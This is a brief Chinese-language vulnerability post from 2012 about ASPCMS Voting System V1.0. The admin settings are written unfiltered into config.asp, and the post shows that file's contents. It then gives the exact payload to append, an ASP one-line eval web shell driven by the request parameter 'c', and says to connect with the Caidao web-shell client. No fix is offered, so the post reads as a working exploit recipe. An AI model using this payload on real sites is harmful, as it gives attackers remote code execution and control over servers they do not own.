发布日期:2012-12-12
发布作者:月末
漏洞类型:设计错误
漏洞描述:后台配置文件采用文件写入,未严格过滤导致插入一句话木马。
config.asp内容
- <%Const SiteName="ASPCMS 开源投票系统 V1.0" Const ks="0" Const xxps="1" Const kssm="投票已关闭,更多信息请登录http://www.aspcms.com" Const gz="3" Const glsj="" Const Copyright="Copyright 2006-2011 上谷网络 版权所有(底部信息,可在后台网站基本设置修改)" %>
在末尾加上
"%><%eval request("c")%>
菜刀连接: